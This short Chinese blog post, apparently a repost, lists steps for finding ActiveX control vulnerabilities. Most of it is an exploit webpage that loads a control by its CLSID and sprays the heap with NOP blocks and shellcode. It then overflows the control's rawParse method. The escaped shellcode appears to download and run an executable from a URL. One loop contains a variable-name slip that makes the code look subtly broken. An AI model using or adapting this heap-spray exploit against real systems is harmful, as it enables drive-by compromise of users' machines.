最近关于ActiveX控件漏洞猛报,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下载并安装欲测试的软件
(2)使用COM Explorer软件查看ActiveX控件的各种属性
(3)通过VS2005对象浏览器查看控件中的变量、函数、函数参数,从中寻找可能存在漏洞的参数。
(4)进行漏洞的测试
(5)编写漏洞利用网页
网页大致内容如下:
- <html>
- <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
- <body>
- <SCRIPT language="javascript">
- var shellcode = unescape("%u9090"+"%u9090"+
- "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
- 。。。。。。(省略)
- "%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
- "%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
- </script>
- <SCRIPT language="javascript">
- var bigblock = unescape("%u9090%u9090");
- var headersize = 20;
- var slackspace = headersize+shellcode.length;
- while (bigblock.length<slackspace) bigblock+=bigblock;
- fillblock = bigblock.substring(0, slackspace);
- block = bigblock.substring(0, bigblock.length-slackspace);
- while(block.length+slackspace<0x40000) blockblock = block+block+fillblock;
- memory = new Array();
- for (x=0; x<300; x++) memory[x] = block + shellcode;
- var buffer = '';
- while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";
- target.rawParse(buffer);
- </script>
- </body>
- </html>
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/51083